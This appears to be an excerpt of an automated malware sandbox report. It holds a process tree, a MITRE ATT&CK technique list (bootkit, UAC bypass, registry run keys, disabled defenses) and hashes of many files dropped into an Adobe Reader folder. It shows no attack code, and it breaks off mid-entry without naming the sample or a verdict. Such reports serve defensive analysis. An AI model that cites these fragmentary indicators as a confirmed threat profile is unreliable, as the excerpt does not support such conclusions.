C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.5.54016287\1437624456" -childID 4 -isForBrowser -prefsHandle 4880 -prefMapHandle 4700 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ead7cd48-d18a-408b-9d2a-e68a870bf625} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 5428 2676cec8c58 tab3⤵PID:3960
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.6.1354947477\743920846" -childID 5 -isForBrowser -prefsHandle 5420 -prefMapHandle 4868 -prefsLen 27652 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c157d164-7903-4de6-8c90-f8eaa8f1e285} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 5592 2676d73e558 tab3⤵PID:5412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5840.7.369834930\2807757" -childID 6 -isForBrowser -prefsHandle 5056 -prefMapHandle 2572 -prefsLen 27731 -prefMapSize 235121 -jsInitHandle 1336 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28533c7e-bb4c-46f3-8fa6-dce878997c78} 5840 "\\.\pipe\gecko-crash-server-pipe.5840" 4988 2676e8f2058 tab3⤵PID:4696
-
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39be055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2964
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
5Registry Run Keys / Startup Folder
3Winlogon Helper DLL
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
5Registry Run Keys / Startup Folder
3Winlogon Helper DLL
2Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
3Disable or Modify Tools
3Modify Registry
11Pre-OS Boot
1Bootkit
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
682KB
MD5e463bb3e952e8648244a952a34edec4d
SHA14deb602eeef29edf26ef57ec7fea82fcec955ea7
SHA256c9916405e005081ed9d86efbb7276205ef83e30f3b2c11163f7382022a2d561c
SHA5121362cfd534f44474bf145662925931b50d4dc4b4190b57361cc0eb618230f17a6e536d0956809905be7476a9eed06283e6edd4049de30f874d62ea0f95e3d507
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\images\s_remove_18.svg
Filesize711B
MD58bb62cfad37334a15129a0da2091d472
SHA1a9f223eb2bd355c8cbf7d17db501db834f39cb6c
SHA25694f76b160568e3705f1e0d2d6ff3ee6927bd812032498d373bbcc516af2864f7
SHA512da08c15accffeca9c1ec985899ebf234aa881546dfb80862c72bfe206dfbf92772582ff87c0636ca0a4cdeeb03635de7a24aecacba86e22683a1d689724d6dab
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon.png
Filesize445B
MD5ed537606a39879a091a8c085cf95ff38
SHA186c73d85094efbfdcd80abf119f03b64a71cbd0f
SHA25642c312aa2a038ca54e9a6fe4bad8c9c044c35b4c5f421496f289c00c957d7591
SHA512fc331c2e1ec84a6a83b51f365484033b3069d73c5987094cf526c45a92c3297df22fe2a35ec20382ed4d563ee604ecbdbdf17fb735f7e0118ab444b4d5db8e9d
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon_2x.png
Filesize611B
MD537d179c947c13f64b7b6356f57441032
SHA19d1c1bd0c370336c229baeb2cd7f80d7b3cf4d0a
SHA25671039e6370f68913e67cb8451d3127c22d3e1045ca644e4dc9821e9f6f6899aa
SHA5123034a8b9694bbde20be0f7fa2596fbca8fd3f1e45810b15a5cb1a2bc6f4ef852afc36639a56f82a4e582d74684724d5c4ee43cbf5e33c94c6cf00b3c059757bf
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon_hover.png
Filesize388B
MD56d8f7e9751f955452a9ceeb815456035
SHA1e6903b2ec0f2c5632d4288f88d993d4a41f04527
SHA2568bcf53efcb1b630087d4cfcedf5e48a7abaa9c71dd13745eedfd2c7cfa6827f5
SHA512c869a94a224bce8ed553f5a86ffdea6d8a279e06a1c060b311cc52e4538b89e07fc0a4a76f85a28e2f62e8629a7c67101e990cc12bef2d0e2d6d7d3c1d4d7d90
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\rhp_world_icon_hover_2x.png
Filesize552B
MD5f364ee8508831e375004ac82b924efd5
SHA1b04bc510ef53760bdd22ce0dd9d2e2f248c16df7
SHA25687da831caa04bd303918a32265830ff97648dc8adc18881ba14d1cc1d28cde85
SHA512399b2da615c0373214e3cf421f502fd0de02bdb9473da644e9f23df9ea7fc792da7d36bde61a456c2451276f74877232c8bedbe55e57098c1ffd13719206bac3
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon.png
Filesize388B
MD539be6b8bd8dce3ff5a1c20ac41ba993f
SHA1a49d8a0c769601bf922c8aa1673bfd3a92d67855
SHA256854a09f1f875a3a2e6566c593af465c9c8a3aa9b9112eb755bb09cee76224a63
SHA5129fd5d4f02aa9d24ce9591ac0542d0abadf2b26208c3043220d2a0f036298199131ad804f9be20c6cc67f39e2921eebec65efb3a1e435ee7318fd8591fcc2fa2a
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_2x.png
Filesize552B
MD5b34c8c3b8117b038839beefa0df5a7ce
SHA1c8d1e8eb4c71d5aa02e36fe3b7365374a9e4e32b
SHA256bfef65c62bfc309f698e8e0b999edfc06ad272b87d805f183551c43f08d704a9
SHA51289fa9f31f62c6e119e6280dbc475c35dd7bb37c27457732a0b1cb04809a35fec44a12ccb6a3a626586d596a0636d754a9ff79ecd9ed739c5c6edea50738a60d7
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png
Filesize388B
MD52ca9f57d61ed45337ec4e6565480367f
SHA1fa06ed14d72ad8ced6ad98a4e223bc80cccc5e75
SHA256a584379ebf9aa0d3c0239edb7e1f114f01a9865f01c68494d5f28d410ba8d873
SHA51283a172f2f304b2f634c313e248b62c11b7798f416872929ef233134bfc4ad8f44b1b4dfa123e8378a233417e1298a73088258f5671ace96ff677d1f26447de87
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover_2x.png
Filesize552B
MD574af10749d7f19d15c8dca65a7453415
SHA1dc96d9dbffe472600548dc64c724055e62620d8d
SHA2560e0084df79ab98e5df48ed1e01987f7ac3fcf4a038dd5453708d868f73a073a8
SHA51283d190bf6f9cb77894e7aaf84029c40a2a0335e43d08062ca2275a2cb7a784a29b3b7b8be820c7dfb2f1458ab0528fcdfe45f05491be673b30495e1ed916999e
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\icons.png
Filesize7KB
MD5d3963e6fe853dbd9d22f794d5ece4c48
SHA1db35a3e565d0b6dca7ad243443a5560a1247eb33
SHA256a870c4e9ff6c433b5583a8f09fcdfbe712241c7e7d64cd59a10c2ad592f64fe5
SHA512fe60a1b2a20d3c11152df2d6fbee05c3d6b80c89486d258dd6d318c3f89deef3e91a116c502c117d79a5020489e394194310f5c7a7ea3d4b7d284ca5a3e43ca7
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif
Filesize7KB
MD5d4585d0ccf35ae69b1246339cfb46b90
SHA11fffc3492684a5db89e949d2d8b612eabb38994b
SHA256d6707a7a393687bccd92de05cecbd746be791f3a670cb4fc106252f49d2a0a2a
SHA512a85560cabd3ce3dd21177948884a921385c0325b431dd281edda61d3585a69ceef28cb339c5a88d167597451ce22d54828b03d69823b5737bf3e253bd9bda9f6
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\icons_retina.png
Filesize15KB
MD57045217d47de04c1d72eea7413b780c4
SHA104c73e38fa17d35a1f684577cc79d77615c09e02
SHA2568c659d0904687a97d9c6b649e4b74e99b286265e92252908824efcd07f956b66
SHA512abe433cb154598ad2c0de6070d6e75bb70274a58ce92007ce200201f788553517bb579b0df5cbde3b4f2bebdca1243f0e54836d125d72ea206b3ccba1d15a385
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\new_icons.png
Filesize8KB
MD50e366a48bdf6a3b140508e56eed0bf0f
SHA1bcd76a4a537fc00d8c468b9496d3d5b5dd6a2a7e
SHA256a311b5a78e1b856505337b90e53edb4ba380160234e1b4e8801c231ba8d590a5
SHA5121830e3e260a50f79553673bec5775c0ba623284d233c25a2da016f273e67e218f5d2f49bed5f9e68842c7dc14b852e979fbfc7ed336f9a34dafd04a48742f827
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-computer\images\themes\dark\new_icons_retina.png
Filesize17KB
MD528a435033f504be69def6f9d52efd2b8
SHA16f50318e05b79851a445f98d4b3ae3d65feb22ad
SHA256f84c7c93947e86e2a499117d4c55910de9fbaefb6d703a8d0f90f4867c69c182
SHA512a2b410bb6bb328eb1e3af794259bacce7918f44698c8145fa530af9be6bfc22a064c1f0ee5d7ce289f4a60a50fce9b56a720793d19ec477340b1d7ef158df6b0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\bg_pattern_RHP.png
Filesize179B
MD5117ec36a5cc6d82e63e8b3beae4a3099
SHA14c692192be53827f8ec8015ceb129f6e0f89e923
SHA256041917c06c638a1b1accaf0d2f0b2a6dd335dea629de602e104553024d822ea4
SHA512abb02a02a9161ece12464020676e880f1eed96b43a9dfd4f7ca06dc203fe633b0a712da5f151d36a5644d65aad7b2880c135df0bc42d7c1e61b44006807a8c9d
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\illustrations_retina.png
Filesize19KB
MD5ff84cb8f89545b86e32abd27a9694e1e
SHA13cde537531f8689772bc9eb39a12c687da5d5225
SHA2568b32854c17056ea617a680cd26ea91015e77d68260f656758984583eb6895a87
SHA5122690d712ba02fbaa769689d0eae380d0988721c6fcb710e04e1e2aba56496cb58f5d4168fe75540139afce179b1250c2ceb11fc4c3d589a3615ad20dccacc8f1
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png
Filesize703B
MD5ccc8d470e94b3441e41521572ba86ccd
SHA1d294d7e78b596fefcc8084fab7917c54d3043e27
SHA256a7cdf870b0b1b8459e94ed25a29daa87f5e9050294bf6cdff3bc72f93b928f94
SHA512f3b2ca4d3160a089f6959b7c8e3e6c213c0facb2733f7948a7222196d3bd8c7350015602569df2cdc7408e38b0ff6700306d7e3439f0892b4d13d9f2d5329e42
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\images\themes\dark\illustrations.png
Filesize8KB
MD5f6e318123e7ad5933a49669eb035c737
SHA1ed8938fa3c13af75978bbd0bcdd3e8bd40a02004
SHA25619f68990146444907956056019aaee514c522c3c00ae00604da44a1bec2f8f51
SHA512b2506a283dbdcf40ba0cac63b4fd0249463218cc9511ce52cae5ab8c36706090fc1f1942f1082204dcdad5d80e7b655d9e12326c820ac21f64a508999e130743
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\my-files\js\nls\ui-strings.js
Filesize1KB
MD5d59d8ff7aaa17ee875adbe48b7a77e78
SHA17405acc07f6137b7fd9575f99a2b4354135956ef
SHA256d74c0782682efde01c1c30e46814256f7d16d7df00a7167d90f2bd55ebaab626
SHA51263fc8bef9e8ef833e45d99f954a9eb99d6bbcae39b2eca8a7000ac11b976cdd0ce0581e5e5e6b2f1bb2bdc911e31690e503dad945f0a3ea702dfe404896eded8
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\pages-app\images\example_icons.png
Filesize683B
MD5a0522ef468697e74b90c444ceb4aa17a
SHA131fa5bb9b4ada150c9001b6e9f3213644117187f
SHA25657804748e775c08ae188b4d860f31e4482ab99b44ed1d8489780daa6756fb11c
SHA512bbb91f8b3c204c4c04da2ad635eb18e9f224f73395dac509c438c0a645316162b6ff78e03e7af76d5da2d9e84cd0c4b5e9db1d4dc08bc3f524bcc55c1f4dbbd3
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\pages-app\images\example_icons2x.png
Filesize1KB
MD599a1fefa123aa745b30727cc5ad50126
SHA1c48f74cee78f8ed8463634d80c4112f3e12bd566
SHA2567a610114be56ff131462bc67f9a23bcd4fde4fdd0158691448ab9e4a3eb2ca3b
SHA512504800f03a4aa57c1cfa15b28542382728b5f3dd85309fe12ebfd711980d78d15d8241d5f54956ee41da2cd65203b7764ab7b15119457b74ebc07fcf8e55a742
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\search-summary\js\nls\ui-strings.js
Filesize1KB
MD53dde11f8594519f004ded2687db9b90e
SHA1fcf1854df851616a25d7cf1439a9120b16902420
SHA256196c132938d324c62184ddc85bdb1cd642af830712e0fbf0fb3230978316d510
SHA512adc2cb3a37dbf5fe2ae79f5752c0d38d2427a95e333e848ffa113046f630eaa967b3cb29c049dcdd9b921d57e23392562d779c24207f770aba6e92392064f17b
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\task-handler\js\nls\fi-fi\ui-strings.js
Filesize823B
MD55e884e2f05ac036b7a6cded3efc2ea2d
SHA1807c1cf1bf0943404601b6241bf4bcf9fcc29c9e
SHA256b333de3a4a7be7749b82302085ed26ad868f0f8eccd09d2a8bb8840414e624d6
SHA5126665aa6fa35e05d01a4a2312a93faf52d6b39409bfaa861c187b0cc2fc51e74aa253ebf56061872d548cb6d3d7bbf1f7c2568de81e5287e0a1d6591c1e780f15
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\css\home-selector.css
Filesize802B
MD5bfeb063e064c71e44ce75898e79c61bc
SHA1c4dcb4b6814cbee53b415a2a5df02fa500510ef3
SHA256af439ebb0d55750003f7dbec517e7b0b26a6a0506b21e3b74d800cd1c7faa004
SHA5120835ebe63867fba6d69a25c83dca767ffd9c57907ba76d9c71012be18510e2145a358d37c1cf4e4ad35d1cdd4f67ffd5928e70e18a376db607d8482356f12219
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\bun.png
Filesize2KB
MD54c27ad089d04cfefd979d56f2a67b172
SHA163289f9198ee4553759b07de7a4229ad370fa976
SHA256e34bcd5b8436d3bc45f98dd913d41f185c6b06326b66937d6e0d5c6434b16fe7
SHA51223f9283f769fd310dcac26cac00d2eb033763d73bd45b0d148ea1ec3a3c75b073572c9fa9234699372a7e1caad7fcde7629d004815536df1d39d291f2d2d96a9
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png
Filesize2KB
MD561bd39ed095fa82ffd334fbd7982616c
SHA151af9c2cd42743c5cf81200e0fba3cfaff801885
SHA256237a70fe0388ce6884f5424692c460625691ef7acb0bf80403ec6b25f348b94a
SHA51254dd8e1a5c19a9d51892a12e9501b7f6f69e09e0c446ec36f7ddfd9ad0d9cef52604ab2f8071c71ce63989510a703f1cfd5492e1ac20c8b37258ba21f8952400
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png
Filesize4KB
MD5543415ad8ba14db1b75a93a551a4abfc
SHA13d4737451e899240fe19daa07f3c58ce9a623631
SHA25603bcfd7fcbd98e48b1954f912ecd66ce0bd5c181da0c2408beed01486ed23804
SHA5127c4bd1cf6fc8d7aeedb1c666ca45c95615927fe76cad3d3c4f4dafc987f4ac04f527ecaebb3103f593eb080302e768fcd77739ce8344ff2e7ec10efdd1113cd0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png
Filesize385B
MD5c789d387908d7b7f21c6474a86e84019
SHA11c36fc6954178c43d9249a5ff3c7246057c6aead
SHA256223f32512aec50c1c00fafc476d8e4ce61e79aa748c67b72fe55514882a31a5a
SHA5121cab85dff119b591046049b69b6208283ca5e009d95129bb407df2768c82da30fd2af8debf6f1bbd91f37518538f3ba6bcda32b63d1d278b56fdd1f5f93439ca
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\nub.png
Filesize1003B
MD5c5aab3d175e0a3753ed2c3bbd7b929c1
SHA13ebee0101ad62449a67f506df9c8e7dacc39f877
SHA2562e187b74e926afe70eafe0648c7125817e99f5586eee3e2e05446e360d4cc1bd
SHA512e967020462477c3e9465e3383c544cf468dd89f4da084193634f5bcdc001b90f5bad3f4f6dda9e95ebe068108986daf41504e02331f4922ea25e7ffee1f27040
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons.png
Filesize1KB
MD5808971f45b803583d9d1f812803d81b7
SHA10f6aaecba7c976ed8c2f53782b3d3148f41b2905
SHA256c25d9409ddf9645c2731ec785cacbb7568005bfc78fe0aec7df3ae3c4d30e333
SHA512121e6b01125f9e9d4894f7d498bb4d39ce676ce51e29cbcd148e0c1feed46fbc58267cea7d5f66654be831dc479e4643be8b28b005467309b7df5cc7fbcd0dbe
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png
Filesize2KB
MD5ad68c0b141ea1dbfcadb540c1817289f
SHA1548a46167f7f5193c5a1335753bc208bf92aa504
SHA256537ac64cd204d7ef82cfe41c932deb9cb1ae738b2156eff4dbf73208384c0a13
SHA512269ae39458a9f30351166f304825b777f3ff143b7914b98e83e01600fa04c7790e6e813466c2a1c5396ce13cd2199792905cf0baba1cd28a420440efce0843e8
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\dd_arrow_small.png
Filesize289B
MD536503740756a442b7be294947462be83
SHA1a1203ae869deb46f59a3273f6d130e7457bf5321
SHA256d188ab283c552eee50677129f3b0ffd8d97828c4e7007bea258174c9a2200e87
SHA5126ff98b15c7d757dd351bf50a1c4ac759a73fdafe03d5fad506478550987d0ec016ba9e617c099e6bf7b0263846eddc4eb32cb70fb1fbbc1189791defe556967a
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource1\static\js\plugins\tracked-send\js\viewer\nls\nl-nl\ui-strings.js
Filesize840B
MD532147da1c647161e45a1004eb1b16349
SHA1a953c222cce91729ebab36bddd43bd5a795a69cc
SHA256434731fdc6d2f5115c5f7786ac989fedef7d0f60cd2ad4385cc98f6d2160566c
SHA5128c825f8d38519cdac2a49e4ee8a9564ae72839199562ce9acfe72b4fbb94f8946775054782cf26a9566eaf8cf944a26e42b7b372c4e7349b33a8e17dcd13df94
-
Filesize
2KB
MD58d0dfb878717f45062204acbf1a1f54c
SHA11175501fc0448ad267b31a10792b2469574e6c4a
SHA2568cf6a20422a0f72bcb0556b3669207798d8f50ceec6b301b8f0f1278b8f481f9
SHA512e4f661ba8948471ffc9e14c18c6779dba3bd9dcc527d646d503c7d4bdff448b506a7746154380870262902f878275a8925bf6aa12a0b8c6eb8517f3a72405558
-
Filesize
2KB
MD5da104c1bbf61b5a31d566011f85ab03e
SHA1a05583d0f814685c4bb8bf16fd02449848efddc4
SHA2566b47ad7fe648620ea15b9c07e62880af48a504b83e8031b2521c25e508aa0ef1
SHA512a8e27abefb0f5bfffe15a19fd882b2e112687abe6ac4bbd5187036cb6058b0124d6ce76fc9227970c8fe2f5768aa0d1faa3319d33b1f42413e8bdfe2ce15296d
-
Filesize
2KB
MD5f57ff98d974bc6b6d0df56263af5ca0d
SHA12786eb87cbe958495a0113f16f8c699935c74ef9
SHA2569508d82995364556a882c54306210e885868a8df2f2ad93485c14f88c9f9e1b7
SHA5121d4ca268d1c98ac545008b079076609e18bfdf22cd31b7b75b9218d03c6edb37b245298ff717e48309ca862f973a4383b101e43732a162b4d7f78573612c64ea
-
Filesize
2KB
MD57fb2e99c5a3f7a30ba91cb156ccc19b7
SHA14b70de8bb59dca60fc006d90ae6d8c839eff7e6e
SHA25640436d5ab3589d33dae09b470ccacd369422d2569804cf1532e5946fc7e45535
SHA512c0d83325928d629abba648360c8687091d18d52991297d69625ccd4617d4d5add4aa16c288cc408b26c79cd37decf5ee2198e8b87b67ef5b88802afae93fb51a
-
Filesize
3KB
MD5a49c8996d20dfb273d03d2d37babd574
SHA196a93fd5aa1d5438217f17bffbc26e668d28feaf
SHA256f4c568336894b3140f0ca7005a5751ad5a860422290b2b6e23d72656160862b1
SHA5129abb666891fa00ae77801fe9b3aab62bca37402197d22983e98d8442e6d890b1091a47dc1eca1ac68caa52a633bb60c8c3248de65056a6435f4affb98f401a30
-
Filesize
3KB
MD5e65884abe6126db5839d7677be462aba
SHA14f7057385928422dc8ec90c2fc3488201a0287a8
SHA2568956643da83aa74bc89b4d71db7b470200863de230be647a6881d8f3f60df3ac
SHA5127285b8acca0210a85dd4317a7beab161708544c4c25a742ce7284b545fa4953be89eb685e62f30fba56d6cb2fc806062ccdf4a0e62516eea047097c6856900c2
-
Filesize
3KB
MD5f355305ada3929ac1294e6c38048b133
SHA1a488065c32b92d9899b3125fb504d8a00d054e0e
SHA25637de9b0126ffa3967455083dd72ba70501b1e4c92ae25eb0667f840911585775
SHA5126082003d98022597007623ff7cdece9d9a14ad19bf55ac35afb2277fe22378c865899a5b28b4b5828d0d48fb7859fea82886d98d8d3a3813413f1e864e3849b2
-
Filesize
3KB
MD51d812d808b4fd7ca678ea93e2b059e17
SHA1c02b194f69cead015d47c0bad243a4441ec6d2cd
SHA256e4e2fe6652557dec0e703da7325808cab4722961398dc9bf9fdae36c1de8841d
SHA512a8781c78d7d23f70f7450e749732d2909447cfa194d8e49a899c77f808e735878da8d838eecb4e8db7470d040800ae45f977d5f208bfad6c15d62d6456611e84
-
Filesize
3KB
MD5e0436699f1df69af9e24efb9092d60a9
SHA1d2c6eed1355a8428c5447fa2ecdd6a3067d6743e
SHA256eeae94fa4ddca88b0fefec2e449064ea1c6d4c8772762bb900dc7752b68706e4
SHA512d6b4adf98c9deb784be1f775a138a7252b558b9d9443a8a3d1435043196738b1ea32439cd09c507d0e2a074a5ba2973e7ffce6c41b26e17460b7695428666cbf
-
Filesize
3KB
MD5f45528dfb8759e78c4e933367c2e4ea8
SHA1836962ef96ed4597dbc6daa38042c2438305693a
SHA25631d92998e8e9de48700039027a935b5de3242afd4938e6b10509dc87d84eb758
SHA51216561ca527e2081519decbc0fb04b9955b398eb97db7a3d442500b6aefcb4e620bebd87d7c8ddad2cf940035710fc5a000b59d7ed5d0aa06f3af87e9eebcb523
-
Filesize
3KB
MD5195bb4fe6012b2d9e5f695269970fce5
SHA1a62ef137a9bc770e22de60a8f68b6cc9f36e343b
SHA256afa59cb80b91e29360a95746979be494bdee659d9b8bfad65782b474273d5e62
SHA5128fbe3ca2950261d976b80efd6a8d36d4a47b445a3e4669e100ce8c5d2a1f692e7b40ab324494a6de7847861d99194e13344a84aa135e458924b95fadf3905fd4
-
Filesize
3KB
MD53c0ef957c7c8d205fca5dae28b9c7b10
SHA14b5927bf1cf8887956152665143f4589d0875d58
SHA2563e6a44a4e993d70a2f8409b4194fa15551d5f7a3651a5d1e74d3c6b640da08c7
SHA512bf2a5dd182c7cce4f6d00a4a1738f3a777b61c612c2449716b0fa62c62570ca1c21ac0063c221923e5db3b4101a4e7e32e711c9bfa075a2949ea9fa2e51ca704
-
Filesize
3KB
MD52445d5c72c6344c48065349fa4e1218c
SHA189df27d1b534eb47fae941773d8fce0e0ee1d036
SHA256694d6774638b36148f7a1b14809a025a16895ad4ec8645a6db2fe9cd5f784dbb
SHA512d8134a66845c71d633f56e5fd656d545f09dad82d18ec21a7415f825cb6c0634ed775008c6fdea83dfec95ce659144e6de806edac620f389fcc3064683c3a7b3
-
Filesize
3KB
MD5678d78316b7862a9102b9245b3f4a492
SHA1b272d1d005e06192de047a652d16efa845c7668c
SHA25626fab597e882c877562abea6b13557c60d3ed07fd359314cdc3a558f8224266b
SHA512cb6154e67ea75612dddd426e448f78c87946b123ff7b81f3fc83444adac4692bb5f3a04038291d9df7e102a301e41541a10e709e8adfde376016d86de15087db
-
Filesize
3KB
MD5aa4c8764a4b2a5c051e0d7009c1e7de3
SHA15e67091400cba112ac13e3689e871e5ce7a134fe
SHA2561da7b39ec5f3cad19dc66f46fee90c22a5a023a541eca76325074bee5c5a7260
SHA512eea254f7327639999f68f4f67308f4251d900adb725f62c71c198d83b62aa3215f2ce23bd679fddde6ac0c40a5c7b6b04800bc069f2940e21e173b830d5762e2
-
Filesize
4KB
MD57c216e06c4cb8d9e499b21b1a05c3e4a
SHA1d42dde78eb9548de2171978c525194f4fa2c413c
SHA2560083bb52df2830f2fc0e03ffa861728916e3f1a6db3560e66adbca9716318ee3
SHA5126ffbcc1c6ad1a0c01a35fdbf14918dfc9e2026a3021e3b6d761d56f4006b4218ffc2278eb2f820ae54722cd0c35fde40ca715154f6e2ae6c24aef0724d0ed004
-
Filesize
4KB
MD5e17061f9a7cb1006a02537a04178464d
SHA1810b350f495f82587134cdf16f2bd5caebc36cf5
SHA2569049038f58e048cc509bcc51434119465c376700ec45bedfd1d8f45440bdc32a
SHA512d5b899109a16195d3fdb8f23382b48bab70dfcd0c823a03a0cdc4e50501812fc644b938839c3346e8aabc2925ce3bdebffad07ef2f90d291663275ba3d225ab3
-
Filesize
3KB
MD563dbf53411402e2a121c3822194a1347
SHA186a2e77e667267791054021c459c1607c9b8dbb6
SHA25647b80b828244964005bd947b80958f3aa6372b843dc088e33fbbd35ab3f785c5
SHA5124b4603d88bddcb86e4282dafd55d8f00b852464daab588a554db829af566d5aa6baa3d575c58b133276be22203c014de73c0c3e35bfbe53570c356ef47bb5a50
-
Filesize
3KB
MD50197012f782ed1195790f9bf0884ca0d
SHA1fc0115826fbaf8cefa478e506b46b7b66a804f13
SHA256c999fa6fd26a4a2af2155bd05522b44b54d6df90d1a9703a288bdf18b623c2cc
SHA512614bce1f761871ba1113de49217725b7b6661c703b03864cef736f44e2d1e0c5fbe133966d24afb15900f0e4da16b24000a2a638b6d7839848874f386b3b81c1
-
Filesize
3KB
MD5b45ff2750a41e0d8ca6a597fbcd41b57
SHA1cf162e0371a1a394803a1f3145d5e9b7cddd5088
SHA256727a2aac0697bcfecdc56dc4507516f9f64c5faa426f0ce69f7e607b74c4e1f4
SHA51282a9a3fc7dfae0ed6bf665c4f369f053af372551c1871d6b3dc775f447ba727e921ab831f8acd712cc31b66156eac643859404f05386e2592a15954fb78d87a3
-
Filesize
3KB
MD595113a3147eeeb845523bdb4f6b211b8
SHA1f817f20af3b5168a61982554bf683f3be0648da1
SHA256800f0c501905bc4257415ee8bed738f897273600c721e80a15bcfbb2e2b3b847
SHA5124e55d9ced90f255b20890595f8e07ccaeedcbe08aed6303336eae7f66df1e50429259b62c556d5d8b179f7f9be22216c1592ba772e2cebd257b3401109f45cc4
-
Filesize
3KB
MD58ce29c28d4d6bda14b90afb17a29a7f9
SHA194a28ce125f63fcd5c7598f7cb9e183732ebdc16
SHA256eb9abbeddd27ce6fa82f1f7437309209450f9f8412eb395923a45d946d9c50b1
SHA512037babd109af1a2c05d7db87536bec41e3075d1120a37384d66f9460d8790be5732f8bbe6a2a13db3d017806fed88945f2a98697b586284b62760252276a8077
-
Filesize
3KB
MD583ddcf0464fd3f42c5093c58beb8f941
SHA1e8516b6468a42a450235bcc7d895f80f4f1ca189
SHA256ebb3efda95b2d2588983742f96f51bdbcb9d87a6949f2c37ea11f509d236a536
